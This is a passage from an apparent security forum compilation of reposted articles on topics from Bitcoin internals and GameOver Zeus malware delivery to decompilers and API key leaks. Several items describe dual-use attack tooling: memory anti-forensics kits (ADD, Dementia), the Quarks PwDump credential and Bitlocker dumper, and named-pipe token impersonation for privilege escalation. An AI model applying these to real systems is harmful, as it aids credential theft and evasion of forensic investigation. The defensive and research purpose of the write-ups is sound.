[8] You can also generate transactions and send them into the Bitcoin network as raw transactions using the bitcoin-qt console. Type sendrawtransaction a1b2c3d4.... This has the advantage of providing information in the debug log if the transaction is rejected. If you just want to experiment with the Bitcoin network, this is much, much easier than my manual approach.

[9] Apparently there's no solid reason to use RIPEMD-160 hashing to create the address and SHA-256 hashing elsewhere, beyond a vague sense that using a different hash algorithm helps security. See discussion. Using one round of SHA-256 is subject to a length extension attack, which explains why double-hashing is used.

[10] The Base58Check algorithm is documented on the Bitcoin wiki. It is similar to Base64 encoding, except it omits the O, 0, I, and l characters to avoid ambiguity in printed text. A 4-byte checksum guards against errors, since using an erroneous bitcoin address will cause the bitcoins to be lost forever.

[11] Some boilerplate has been removed from the code snippets. For the full Python code, see GitHub. You will also need the ecdsa cryptography library.

[12] You may wonder how I ended up with addresses with nonrandom prefixes such as 1MMMM. The answer is brute force - I ran the address generation script overnight and collected some good addresses. (These addresses made it much easier to recognize my transactions in my testing.)
There are scripts and websites that will generate these "vanity" addresses for you.

[13] For a summary of Bitcoin fees, see bitcoinfees.com. This recent Reddit discussion of fees is also interesting.

[14] The original Bitcoin paper has a similar figure showing how transactions are chained together. I find it very confusing though, since it doesn't distinguish between the address and the public key.

[15] For details on the different types of contracts that can be set up with Bitcoin, see Contracts. One interesting type is the 2-of-3 escrow transaction, where two out of three parties must sign the transaction to release the bitcoins. Bitrated is one site that provides these.

[16] Although Bitcoin's Script language is very flexible, the Bitcoin network only permits a few standard transaction types and non-standard transactions are not propagated (details). Some miners will accept non-standard transactions directly, though.

[17] There isn't a security benefit from copying the scriptPubKey into the spending transaction before signing, since the hash of the original transaction is included in the spending transaction. For discussion, see Why TxPrev.PkScript is inserted into TxCopy during signature check?

[18] The random number used in the elliptic curve signature algorithm is critical to the security of signing. Sony used a constant instead of a random number in the PlayStation 3, allowing the private key to be determined. In an incident related to Bitcoin, a weakness in the random number generator allowed bitcoins to be stolen from Android clients.

[19] For Bitcoin, the coordinates on the elliptic curve are integers modulo the prime 2^256 - 2^32 - 2^9 - 2^8 - 2^7 - 2^6 - 2^4 - 1, which is very nearly 2^256. This is why the keys in Bitcoin are 256-bit keys.
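As a quick sanity check of note [19], the prime is easy to compute directly (my own snippet, not code from the article):

```python
# The secp256k1 field prime from note [19], written out as Python arithmetic.
p = 2**256 - 2**32 - 2**9 - 2**8 - 2**7 - 2**6 - 2**4 - 1

# It is indeed "very nearly" 2^256: the two differ only in the low 33 bits,
# since 2^9 + 2^8 + 2^7 + 2^6 + 2^4 + 1 = 977.
assert p == 2**256 - 2**32 - 977
print(hex(p))  # the well-known secp256k1 prime, ending in ...fffffc2f
```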
[20] For information on the historical connection between elliptic curves and ellipses (the equation turns up when integrating to compute the arc length of an ellipse) see the interesting article Why Ellipses Are Not Elliptic Curves, Adrian Rice and Ezra Brown, Mathematics Magazine, vol. 85, 2012, pp. 163-176. For more introductory information on elliptic curve cryptography, see ECC tutorial or A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography. For more on the mathematics of elliptic curves, see An Introduction to the Theory of Elliptic Curves by Joseph H. Silverman. Three Fermat trails to elliptic curves includes a discussion of how Fermat's Last Theorem was solved with elliptic curves.

[21] There doesn't seem to be documentation on the different Bitcoin protocol versions other than the code. I'm using version 60002 somewhat arbitrarily.

[22] The Wireshark network analysis software can dump out most types of Bitcoin packets, but only if you download a recent beta release - I'm using version 1.11.2.

[23] The full code for my examples is available on GitHub.

[24] Several Bitcoin libraries in Python are bitcoin-python, pycoin, and python-bitcoinlib.

[25] The elliptic curve plot was generated with the Sage mathematics package:

var("x y")
implicit_plot(y^2-x^3-7, (x,-10, 10), (y,-10, 10), figsize=3, title="y^2=x^3+7")

[26] The hardcoded peer list in the Bitcoin client is in chainparams.cpp in the array pnseed. For more information on finding Bitcoin peers, see How Bitcoin clients find each other or Satoshi client node discovery.

Posted by Ken Shirriff at 8:47 AM

Sursa: Ken Shirriff's blog: Bitcoins the hard way: Using the raw Bitcoin protocol
-
GameOver Zeus now uses Encryption to bypass Perimeter Security

The criminals behind the malware delivery system for GameOver Zeus have a new trick: encrypting their EXE file so that, as it passes through your firewall, web filters, network intrusion detection systems and any other defenses you may have in place, it does so as a non-executable ".ENC" file. If you are in charge of network security for your enterprise, you may want to check your logs to see how many .ENC files have been downloaded recently.

Malcovery Security's malware analyst Brendan Griffin let me know about this new behavior on January 27, 2014, and has seen it consistently since that time. On February 1st, I reviewed the reports that Malcovery's team produced and decided that this was a trend we needed to share more broadly than just to the subscribers of our "Today's Top Threat" reports. Subscribers would have been alerted to each of these campaigns, often within minutes of the beginning of the campaign. We sent copies of all the malware below to dozens of security researchers and to law enforcement. We also made sure that we had uploaded all of these files to VirusTotal, which is a great way to let "the industry" know about new malware. I am grateful to William MacArthur of GoDaddy, Brett Stone-Gross of Dell Secure Works, and Boldizsár Bencsáth from CrySys Lab in Hungary, three researchers who jumped in to help look at this with us. Hopefully others will share insights as well, so this will be an ongoing conversation.

To review the process: Cutwail is a spamming botnet that since early fall 2013 has been primarily distributing UPATRE malware via social engineering. The spam message is designed to convince the recipient that it would be appropriate for them to open the attached .zip file.
These .zip files contain a small .exe file whose primary job is to go out to the Internet and download larger, more sophisticated malware that would never pass through spam filters without causing alarm but, because of the way our perimeter security works, is often allowed to be downloaded by a logged-in user from their workstation. As our industry became better at detecting these downloads, the criminals have had a slightly more difficult time infecting people. With the change last week, the new detection rate for the Zeus downloads has consistently been ZERO of FIFTY at VirusTotal. (For example, here is the "Ring Central" .enc file from Friday on VirusTotal -- al3101.enc. Note the timestamp. That was a rescan MORE THAN TWENTY-FOUR HOURS AFTER INITIAL DISTRIBUTION, and it still says 0 of 50.)

Why? Well, because technically, it isn't malware. It doesn't actually execute! All Windows EXE files start with the bytes "MZ". These files start with "ZZP". They aren't executable, so how could they be malware? Except they are. In the new delivery model, the .zip file attached to the email has a NEW version of UPATRE that first downloads the .enc file from the Internet and then DECRYPTS the file, placing it in a new location with a new filename, and then causing it both to execute and to be scheduled to execute in the future.

UPATRE campaigns that use Encryption to Bypass Security

Here are the campaigns we saw this week, with the hashes and sizes for the .zip, the UPATRE .exe, the .enc file, and the decrypted GameOver Zeus .exe file that came from that file. For each campaign, you will see some information about the spam message, including the .zip file that was attached and its size and hash, and the .exe file that was unpacked from that .zip file. Then you will see a screenshot of the email message, followed by the URL that the encrypted GameOver Zeus file was downloaded from, and some statistics about the file AFTER it was decrypted.
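As an aside, the "MZ" versus "ZZP" distinction described above is trivial to check programmatically. A minimal sketch (the byte strings below are illustrative placeholders, not real samples):

```python
def looks_like_pe(data: bytes) -> bool:
    """A Windows executable (PE) file starts with the DOS magic bytes 'MZ'."""
    return data[:2] == b"MZ"

def looks_like_enc(data: bytes) -> bool:
    """The encrypted .ENC payloads described above start with 'ZZP' instead."""
    return data[:3] == b"ZZP"

# A real PE header begins with MZ; the .enc payloads do not, which is why
# scanners that gate on the executable magic wave them through.
print(looks_like_pe(b"MZ\x90\x00..."), looks_like_enc(b"ZZP..."))
```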
ALL OF THESE SPAM CAMPAIGNS ARE RELATED TO EACH OTHER! They are all being distributed by the criminals behind the Cutwail malware delivery infrastructure. It is likely that many different criminals are paying to use this infrastructure.

[TABLE]
[TR][TD]Campaign: 2014-01-27.ADP[/TD][TD]Messages Seen: 2606[/TD][TD]Subject: Invoice #(RND)[/TD][/TR]
[TR][TD]From: ADP - Payroll Services[/TD][TD]payroll.invoices@adp.com[/TD][/TR]
[TR][TD]Invoice.zip[/TD][TD]9767 bytes[/TD][TD]b624601794380b2bee0769e09056769c[/TD][/TR]
[TR][TD]Invoice.PDF.exe[/TD][TD]18944 bytes[/TD][TD]8d3bf40cfbcf03ed13f0a900726170b3[/TD][/TR]
[/TABLE]

Sursa: CyberCrime & Doing Time: GameOver Zeus now uses Encryption to bypass Perimeter Security
-
[h=1]SmartDec[/h]

Native code to C/C++ decompiler.

[h=2]Standalone[/h]

Supports x86 and x86-64 architectures. Reads ELF and PE file formats. Reconstructs functions, their names and arguments, local and global variables, expressions, integer, pointer and structural types, and all types of control-flow structures, including switch. Has a nice graphical user interface with one-click navigation between the assembler code and the reconstructed program. The only decompiler that handles 64-bit code.

[h=2]IDA Pro plug-in[/h]

Enjoys all executable file formats supported by the disassembler. Benefits from IDA's signature search, parsers of debug information, and demanglers. Push-button decompilation of a chosen function or the whole program. Easy jumping between the disassembler and the decompiled code. Full GUI integration.

Sursa: SmartDec | derevenets.com
-
Programmer for CC2538 backdoor UART bootloader

[h=1]CC2538-prog[/h]

CC2538-prog is a command line application to communicate with the CC2538 ROM bootloader.

Copyright © 2014, Toby Jaffey <toby@1248.io>

Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

[h=1]Instructions[/h]

To use cc2538-prog, the chip must first be configured to enable the backdoor UART bootloader. The boards in the CC2538DK are preconfigured with the PER firmware, which disables the backdoor UART bootloader. To enable it, we need to rewrite this flash. CC2538 Bootloader Backdoor - Texas Instruments Wiki

The simplest way to do this is to flash the supplied file firmware/cc2538dk-contiki-demo.hex with the Windows Flash Programmer tool or Uniflash for Linux. To use the backdoor UART bootloader, your firmware must apply the change from the above link to startup_gcc.c (remove BOOTLOADER_BACKDOOR_DISABLE). This change is present in cc2538dk-contiki-demo.hex.

If successful, you should see a flashing LED. From now on, you may enable the bootloader at any time by removing the jumper on the SmartRF06 for RF2.6. Removing the jumper and pressing the EM RESET button will start the bootloader. Firmware may then be loaded with cc2538-prog. Once the firmware is loaded, the bootloader must be disabled before reset, by replacing the RF2.6 jumper.
Sursa: https://github.com/1248/cc2538-prog
-
ADD is a physical memory anti-analysis tool designed to pollute memory with fake artifacts. This tool was first presented at Shmoocon 2014. Please note that this is a proof of concept tool. It forges OS objects in memory (poorly). It would be easy (very easy) to beat with better tool development. The tools would only need to provide better sanity checks of objects discovered during scanning. In that case, further development on ADD would be needed to beat new versions of forensics tools. The tool currently works only against Windows 7 SP1 x86. Huge portions of the driver code were based on the Windows DDK Sioctl driver code sample(because honestly, who wants to build device manager PnP code?). Haven't started source code versioning yet, just wanted to get the code out there so people can play with it. Started a Google code project for this before I remembered they restricted downloads on new projects (I guess all downloads are disabled now). FYI, there are places I don't do error checking where "real" programmers probably would. I'd like to point out that this is a PROOF OF CONCEPT tool. I don't think I'd run it on a target system without further testing and code auditing. Load the driver on a production system at your own risk. I haven't had any bugchecks with it yet, but YMMV. Driver: http://www.mediafire.com/download/v4jop3qois3gv4t/add-driver.zip User Agent: http://www.mediafire.com/download/see7o8rtnuwstp9/ADD_File.zip Reference Memory Image (with faked artifacts): http://www.mediafire.com/download/vvb0dbg2g2h1ukm/ADD-ref-image.zip Shmoocon Slides: ADD_Shmoocon Sursa: https://code.google.com/p/attention-deficit-disorder/
-
Facebook has powerful toys - a new "cold" storage technology holding a full petabyte

Published by Andrei Avadanei in Developers · News — 2 Feb, 2014 at 3:22 pm

Facebook is probably one of the companies holding the most information about, in general, everything we do, both on the social network itself and on related sites - those that embed a Facebook plugin, for example. This mass of information sits far back in our profiles and, most of the time, the social network rarely needs it. Facebook has therefore been developing "cold storage" technologies, and its latest achievement is a prototype that stores data on Blu-ray discs.

Jay Parikh, vice president at Facebook, explained at the Open Compute Summit how this cold-storage prototype could help the social network free up vital space on its servers. In short, the new system uses 10,000 Blu-ray discs at once to store 1 petabyte of data.

Full article (in Romanian): Facebook are juc?rii puternice – o nou? tehnologie de stocare la "rece" de doar 1 petabyte | WORLDIT
-
Arch Linux 2014.02.01 Is Now Available for Download February 2nd, 2014, 11:46 GMT · By Marius Nestor I can't believe that it's already February, and that another ISO image of the powerful Arch Linux distribution has been announced yesterday, as expected, on its official website. Unfortunately for some of you, Arch Linux is still not using the recently released Linux kernel 3.13. As such, Arch Linux 2014.02.01 is powered by Linux kernel 3.12.9, which is also the latest stable release of the upstream Linux 3.12 kernel series. Additionally, Arch Linux 2014.02.01 includes all the updated packages that were released during the past month, January 2014. As usual, existing Arch Linux users don’t need this new ISO image, as it's only intended for those of you who want to install Arch Linux on new machines. Arch Linux is a rolling-release Linux operating system, so in order to keep your Arch system up-to-date, use the sudo pacman -Syu or yaourt -Syua commands. Download Arch Linux 2014.02.01 right now from Softpedia. Follow @mariusnestor Sursa: Arch Linux 2014.02.01 Is Now Available for Download
-
[h=3]Namedpipe Impersonation Attack[/h]

Privilege escalation through named pipe impersonation was a real issue back in 2000, when a flaw in the service control manager allowed any user logged onto a machine to steal the identity of SYSTEM. We haven't heard a lot about this topic since then. Is it still an issue?

First of all, let's talk about the problem. When a process creates a named pipe server, and a client connects to it, the server can impersonate the client. This is not really a problem, and is really useful when dealing with IPC. The problem arises when the client has more rights than the server. This scenario would create a privilege escalation. It turns out that it was pretty easy to accomplish. For example, let's assume that we have 3 processes: server.exe, client.exe and attacker.exe. Server.exe and client.exe have more privileges than attacker.exe. Client.exe communicates with server.exe using a named pipe. If attacker.exe manages to create the pipe server before server.exe does, then, as soon as client.exe connects to the pipe, attacker.exe can impersonate it and the game is over.

Fortunately, Microsoft implemented and recently documented some restrictions and tools to help you manage the risk. First of all, there are some flags buried in the CreateFile documentation that give the pipe client control over what level of impersonation a server can perform. They are called the "Security Quality Of Service". There are 4 flags to define the impersonation level allowed.

SECURITY_ANONYMOUS: The server process cannot obtain identification information about the client, and it cannot impersonate the client.

SECURITY_IDENTIFICATION: The server process can obtain information about the client, such as security identifiers and privileges, but it cannot impersonate the client. ImpersonateNamedPipeClient will succeed, but no resources can be acquired while impersonating the client. The token can be opened and the information it contains can be read.
SECURITY_IMPERSONATION (the default): The server process can impersonate the client's security context on its local system. The server cannot impersonate the client on remote systems.

SECURITY_DELEGATION: The server process can impersonate the client's security context on remote systems.

There are also 2 other flags:

SECURITY_CONTEXT_TRACKING: Specifies that any changes a client makes to its security context are reflected in a server that is impersonating it. If this option isn't specified, the server adopts the context of the client at the time of the impersonation and doesn't receive any changes. This option is honored only when the client and server processes are on the same system.

SECURITY_EFFECTIVE_ONLY: Prevents a server from enabling or disabling a client's privileges or groups while the server is impersonating.

Note: Since the MSDN documentation for these flags is really weak, I used the definitions that can be found in the book "Microsoft® Windows® Internals, Fourth Edition" by Mark Russinovich and David Solomon.

Every time you create a pipe in client mode, you need to find out what the server needs to know about you and pass the right flags to CreateFile. And if you do, don't forget to also pass SECURITY_SQOS_PRESENT, otherwise the other flags will be ignored. Unfortunately, you don't have access to the source code of all the software running on your machine. I bet there are dozens of programs running on my machine right now opening pipes without using the SQOS flags. To "fix" that, Microsoft implemented some restrictions about who a server can impersonate, in order to minimize the chances of being exploited. A server can impersonate a client only if one of the following is true:

The caller has the SeImpersonatePrivilege privilege.
The requested impersonation level is SecurityIdentification or SecurityAnonymous.
The identity of the client is the same as the server.
The token of the client was created using LogonUser from inside the same logon session as the server.

Only Administrators/System/SERVICES have the SeImpersonatePrivilege privilege. If the attacker is a member of these groups, you have much bigger problems. The requested impersonation level in our case is SecurityImpersonation, so the second point does not apply. That leaves us with the last two conditions. Should we worry about them? I think so. Here are some examples:

I'm on XP. I want to run an untrusted application. Since I read my old posts, I know that I can run the process using a stripped-down version of my token. Unfortunately, my restricted token has the same identity as the normal token. It can then try to exploit all applications running on my desktop. This is bad.

My main account is not administrator on the machine. When I want to install software, I use RunAs. This brings up a new problem. RunAs uses LogonUser, and it is called from the same logon session! That means that my untrusted application using a restricted token derived from a standard user token can now try to exploit and impersonate a process running with administrator rights! This is worse.

But how real is all this? This is hard to say. I don't have an idea about the percentage of applications using the SQOS flags. We must not forget that allowing impersonation is also required and desired in certain cases. For fun I took the first application using named pipes that came to my mind: Windbg. There is an option in Windbg to do kernel debugging, and if the OS you are debugging is inside VMware, you can specify the named pipe corresponding to the COM1 port of the VMware image. By default it is "com_1". My untrusted application running with the restricted token was now listening on com_1, and, easy enough, as soon as I started Windbg, the untrusted application was able to steal its token.
To be fair, I have to say that VMware displayed an error message telling me that the com_1 port was "not configured as expected". I should not have started Windbg knowing that. But, eh, who reads error messages?

What should we do now? Well, it turns out that Microsoft implemented two new restrictions in Windows Vista to fix these problems. I don't think they are documented yet.

If the token of a server is restricted, it can impersonate only clients also running with a restricted token.

The server cannot impersonate a client running at a higher integrity level.

These new restrictions fix both my issues. First of all, my untrusted application running with a restricted token can no longer impersonate my normal processes. Then, even if the untrusted application is running with my standard token, it won't be able to impersonate the processes that I start with the "Run As Administrator" elevation prompt, because they are running at a High integrity level.

Now it is time to come back to the main question: is it still an issue? My answer is yes. Windows XP is still the most popular Windows version out there and there is no sign that Vista is going to catch up soon. But I have to admit that I'm relieved to see the light at the end of the tunnel!

--

Some technical details: When you call ImpersonateNamedPipeClient and none of the conditions is met, the function still succeeds, but the impersonation level of the token is SecurityIdentification. If you want to try for yourself, you can find the code to create a server pipe and a client pipe on my code page.

Related link: Impersonation isn't dangerous by David Leblanc

Posted by nsylvain at 4:54 PM

Sursa: The Final Stream: Namedpipe Impersonation Attack
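For reference, the SQOS flags discussed in the post above are just bits OR'd into CreateFile's dwFlagsAndAttributes argument. The values below are taken from the Windows SDK's winbase.h; the combination shown is what a cautious pipe client that only needs to be identified, never impersonated, would pass. This is a sketch of the flag arithmetic only, not a working pipe client:

```python
# SQOS flag values from winbase.h. The impersonation level is the
# SECURITY_IMPERSONATION_LEVEL enum value shifted left by 16 bits.
SECURITY_SQOS_PRESENT     = 0x00100000
SECURITY_ANONYMOUS        = 0 << 16  # SecurityAnonymous
SECURITY_IDENTIFICATION   = 1 << 16  # SecurityIdentification
SECURITY_IMPERSONATION    = 2 << 16  # SecurityImpersonation (the default)
SECURITY_DELEGATION       = 3 << 16  # SecurityDelegation
SECURITY_CONTEXT_TRACKING = 0x00040000
SECURITY_EFFECTIVE_ONLY   = 0x00080000

# A cautious client lets the server identify it but not impersonate it.
# Without SECURITY_SQOS_PRESENT the level bits would be ignored.
flags = SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION
print(hex(flags))  # 0x110000
```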
-
MRG Effitas automatic XOR decryptor tool

Posted by Zoltan Balazs on February 1, 2014 in Latest | 0 comments

Malware writers tend to protect their binaries and configuration files with XOR encryption. Luckily, they never heard about the one-time-pad requirement, which requires "never reuse the XOR key". Binary files usually have long sequences of null bytes, which means the short XOR key (4 ASCII characters in most cases) used by the malware writers can be spotted in the binary as a recurring pattern. This Python script (tested and developed on Python 3.3) can find these recurring patterns at the beginning of the XOR encrypted binary, calculate the correct "offset" of the key, use this XOR key to decrypt the encrypted file, and check the result for known strings. The tool was able to find the correct XOR key in 90% of the cases; in the other cases, fine-tuning the default parameters can help.

We used this tool to decrypt the XOR encrypted binaries found in network dumps, for example when exploit kits (e.g. Neutrino) were able to infect the victim and the payload was delivered to the victim as a XOR encrypted binary.

For a list of parameters, run:

# python auto_xor_decryptor.py -h

The tool is released under the GPLv3 licence. The script can be found on our Github account: https://github.com/MRGEffitas/scripts/blob/master/auto_xor_decryptor.py

An example run of the tool looks like the following:

c:\python33\python auto_xor_decryptor.py --input malware\48_.mp3
Auto XOR decryptor by MRG Effitas. Developed and tested on Python 3.3! This tool can automatically find short XOR keys in a XOR encrypted binary file, and use that to decrypt the XOR encrypted binary. Most parameters are good on default but if it is not working for you, you might try to fine-tune those.
XOR key: b'626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b6862'
XOR key ascii: b'bjkh'
XOR key hex: b'626a6b68'
Offset: 1
Final XOR key: b'jkhb'
Great success!
input read from: malware\48_.mp3, output written to: decrypted

MRG Effitas Team

Sursa: Publishing of MRG Effitas automatic XOR decryptor tool | MRG Effitas
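The core idea the tool relies on, that null bytes in the plaintext leak the key because 0x00 XOR k = k, can be sketched in a few lines of Python. This is my own simplified illustration, not the tool's actual code, and it ignores the key-offset handling the real script performs:

```python
from collections import Counter

def recover_xor_key(data: bytes, key_len: int = 4) -> bytes:
    """Guess a short repeating XOR key: long runs of 0x00 in the plaintext
    show up in the ciphertext as the key itself, repeated, so the most
    common key_len-byte chunk is a good key candidate."""
    chunks = (data[i:i + key_len] for i in range(0, len(data) - key_len, key_len))
    pattern, _count = Counter(chunks).most_common(1)[0]
    return pattern

def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """XOR with a repeating key; XOR is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Demo: a fake "binary" with a long null run, encrypted with key b'bjkh'.
plain = b"MZ\x90\x00" + b"\x00" * 64 + b"This program cannot be run in DOS mode"
enc = xor_decrypt(plain, b"bjkh")  # encrypting and decrypting are the same op
key = recover_xor_key(enc)
print(key)  # b'bjkh'
```

Note that the demo works because the null run is aligned to the key length; the real tool's "offset" step exists precisely to handle the misaligned case.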
-
A Field Study of Run-Time Location Access Disclosures on Android Smartphones

Huiqing Fu, Yulong Yang, Nileema Shingte, Janne Lindqvist, Marco Gruteser
Rutgers University
Please contact janne@winlab.rutgers.edu for any inquiries

Abstract—Smartphone users are increasingly using apps that can access their location, and often these accesses occur without users' knowledge and consent. For example, recent research has shown that installation-time capability disclosures are ineffective in informing people about their apps' location access. In this paper, we present a four-week field study (N=22) on run-time location access disclosures. Towards this end, we implemented a novel method to disclose location accesses by location-enabled apps on participants' smartphones. In particular, the method did not need any changes to participants' phones beyond installing our study app. We randomly divided our participants into two groups: a Disclosure group (N=13), who received our disclosures, and a No Disclosure group (N=9), who received no disclosures from us. Our results confirm that the Android platform's location access disclosure method does not inform participants effectively. Almost all participants pointed out that their location was accessed by several apps they would not have expected to access their location. Further, several apps accessed their location more frequently than they expected. We conclude that our participants appreciated the transparency brought by our run-time disclosures and that, because of the disclosures, most of them had taken actions to manage their apps' location access.

Download: http://www.winlab.rutgers.edu/~janne/USECfieldstudy.pdf
-
[h=1]Dementia[/h]

Dementia is a proof-of-concept memory anti-forensic toolkit designed to hide various artifacts inside a memory dump during memory acquisition on the Microsoft Windows operating system. It works by exploiting memory acquisition tools and hiding operating system artifacts (e.g. processes, threads, etc.) from analysis applications such as Volatility, Memoryze and others. Because of flaws in some of the memory acquisition tools, Dementia can also hide operating system objects from the analysis tools entirely from user mode. For further details about Dementia, check the 29c3 presentation (PDF or video below).

Downloads

Defeating Windows memory forensics.pdf
Dementia-1.0-x64.zip
Dementia-1.0.zip

Sursa: https://code.google.com/p/dementia-forensics/
-
Quarks PwDump

Mon 14 May 2012 By Sébastien Kaczmarek

Quarks PwDump is a new open source tool to dump various types of Windows credentials: local accounts, domain accounts, cached domain credentials and Bitlocker. The tool is currently designed to work live on operating systems, limiting the risk of undermining their integrity or stability. It requires administrator's privileges and is still in beta test.

Quarks PwDump is a native Win32 open source tool to extract credentials from Windows operating systems. It currently extracts:

Local accounts NT/LM hashes + history
Domain accounts NT/LM hashes + history stored in NTDS.dit file
Cached domain credentials
Bitlocker recovery information (recovery passwords & key packages) stored in NTDS.dit

JOHN and LC formats are handled. Supported OS are Windows XP / 2003 / Vista / 7 / 2008 / 8.

Why another pwdump-like dumper tool? No existing tool can dump all of these kinds of hashes and Bitlocker information at the same time; a combination of tools is always needed. The libesedb library (http://sourceforge.net/projects/libesedb/) encounters some rare crashes when parsing different NTDS.dit files; it's safer to directly use the Microsoft JET/ESE API to parse databases originally built with the same functions. The Bitlocker case has been added even though some specific Microsoft tools could be used to dump this information (Active Directory addons or VBS scripts, for example).

The tool is currently dedicated to working live on operating systems, limiting the risk of undermining their integrity or stability. It requires administrator's privileges. We plan to make it work fully offline, for example on a disk image.

How does it internally work?

Case #1: Domain account hashes are extracted offline from NTDS.dit. It's not currently a full offline dump because Quarks PwDump is dynamically linked with ESENT.dll (in charge of JET database parsing), which differs between Windows versions. For example, it's not possible to parse a Win 2008 NTDS.dit file from XP.
In fact, record checksums are computed in a different manner and the database files appear corrupted to the API functions. That's currently the main drawback of the tool: everything should be done on the domain controller. However, no code injection or service installation is performed, and it's possible to securely copy the NTDS.dit file by using Microsoft VSS (Volume Shadow Copy Service).

Case #2: Bitlocker information dump. It's possible to retrieve interesting information from Active Directory if some specific GPOs have been applied by domain administrators (mainly "Turn on BitLocker backup to Active Directory" in group policy).

Recovery password: a 48-digit passphrase which allows a user to mount their partition even if the password has been lost. This password can be used in the Bitlocker recovery console.

Key package: a binary keyfile which allows a user to decipher data on a damaged disk or partition. It can be used with Microsoft tools, especially the Bitlocker Repair Tool.

For each entry found in NTDS.dit, Quarks PwDump shows the recovery password on STDOUT, and keyfiles (key packages) are stored in separate files for each recovery GUID: {GUID_1}.pk, {GUID_2}.pk, ...

Volume GUID: a unique value for each BitLocker-encrypted volume.

Recovery GUID: the recovery password identifier; it can be the same for different encrypted volumes.

Quarks PwDump does not retrieve TPM information yet. When ownership of the TPM is taken as part of turning on BitLocker, a hash of the ownership password can be taken and stored in the AD directory service. This information can then be used to reset ownership of the TPM. This feature will be added in a further release.

In an enterprise environment, those GPOs should often be applied in order to ensure administrators can unlock a protected volume and employers can read specific files following an incident (an intrusion or various malicious acts, for example).
Case #3: Local accounts and cached domain credentials

There isn't anything really new here; a lot of tools already dump these without any problems. However, we have chosen an uncommon way to dump them, which only a few tools use. Hashes are extracted live from the SAM and SECURITY hives in a clean way, without code injection or installing a service. In fact, we use the native registry API, especially the RegSaveKey() and RegLoadKey() functions, which require the SeBackup and SeRestore privileges. Next we mount the SAM/REGISTRY hives on a different mount point and change all key ACLs in order to extend privileges to the Administrators group and not LocalSystem only. That's why we chose to work on a backup, to preserve system integrity.

Writing this tool was not a really difficult challenge; Windows hash and Bitlocker information storage methodologies are mostly well documented. However, it was an interesting project for understanding Microsoft's strange implementation choices for each kind of storage:

- High-level obfuscation techniques are used for local and domain account hashes: many constants, atypical registry value names, a useless ciphering layer, hidden constants stored in the registry Class attribute, ... However, they can be easily defeated.
- The algorithms used sometimes differ between Windows versions, and the overall credential storage approach isn't consistent. Exhaustively, we can find: RC4, MD5, MD4, SHA-256, AES-256, AES-128 and DES.
- Bitlocker information is stored in cleartext in AD domain services.

The project is still in beta and we would really appreciate feedback or suggestions/comments about potential bugs. Binary and source code are available on GitHub (GNU GPL v3 license):

Quarks PwDump v0.1b: https://github.com/quarkslab/quarkspwdump

For NTDS parsing technical details, you can also refer to the MISC MAG #59 article by Thibault Leveslin. Finally, we would like to greet the NTDS hash dump (Csaba Barta), libesedb and creddump authors for their excellent work.

Sursa: Quarks PwDump
-
Accidental API Key Exposure is a Major Problem

This article, about how a security researcher managed to gain access to Prezi's source code by using credentials he found in a public BitBucket repo, became very popular recently. The author concludes his article by saying "Please be aware of what you put up on github/bitbucket."

Accidentally posting API keys, as well as passwords and other sensitive information, on public source control repositories is a huge problem. It potentially allows anybody who comes across your code to access data, send communications, or even make purchases on your behalf. And yet API keys exposed in public GitHub repos are a common occurrence.

As somebody who has accidentally posted private credentials on GitHub in the past myself, before quickly noticing and taking them down, I was interested to see how widespread the problem of inadvertently publishing private credentials is. I did a quick GitHub search for Twilio auth tokens and was alarmed at the results that were returned. (I had no reason in particular for choosing Twilio tokens over any other API tokens; I'm sure every major API provider is affected.) Combining that search with a simple Ruby script wrapping a regular expression, I was able to discover 187 Twilio auth tokens in a matter of minutes. One hundred and eighty-seven. Sitting there waiting to be discovered by a GitHub search. And GitHub would only display the first 1000 results out of around 20,000.

But this is just scratching the surface. When people realise that their API credentials are visible on a public repository, their first instinct is, as it should be, to remove them. But the problem is, removing the tokens and committing the result is not enough. While they will no longer appear in a GitHub code search, any sufficiently motivated person can scroll back through your repository's history on GitHub, and find your code containing your tokens, just as it was before you "removed" them.
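As an aside, the quick scan described above (a regular expression run over code pulled from GitHub search results) can be sketched in a few lines of Python. The article's own script was Ruby and isn't reproduced, so treat the pattern below as an assumption: it simply looks for a 32-character hex string near the word "twilio".

```python
import re

# Twilio auth tokens are 32 hex characters. Matching one within a short
# distance of the word "twilio" cuts down on false positives. (This regex
# is my own guess at the idea, not the article's original Ruby script.)
TOKEN_RE = re.compile(
    r"twilio[\w\s'\".:,()=-]{0,40}?\b([0-9a-fA-F]{32})\b",
    re.IGNORECASE,
)

def find_twilio_tokens(source):
    """Return candidate Twilio auth tokens found in a blob of source code."""
    return [m.group(1) for m in TOKEN_RE.finditer(source)]

# A fabricated example of the kind of line such a search turns up:
sample = "client = Twilio::REST::Client.new(sid, 'aaaabbbbccccddddeeeeffff00001111')"
# find_twilio_tokens(sample) -> ['aaaabbbbccccddddeeeeffff00001111']
```

Running something like this over the raw file contents behind each search result is all it takes to harvest live credentials, which is exactly why the history problem below matters.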
But, especially for side-projects or for casual GitHub users who might not yet fully understand the purpose or features of Git, this potential vulnerability may not be obvious - I have seen more than one person make the mistake of leaving API keys or passwords in their Git history. So what can we do about this?

Replace sensitive information with placeholders

If you aren't using Git for managing a project, and just want to throw it up on GitHub so you can share your code, the solution is simple: you can just remove your sensitive passwords from the code and replace them with an empty string or "<api key here>" or some other placeholder. But when you're actually using source control for managing your project, this solution starts to fall apart. You need another way of keeping your credentials out of your repository.

Storing sensitive information outside of source control

Some common methods of storing sensitive information that won't show up in your repository are:

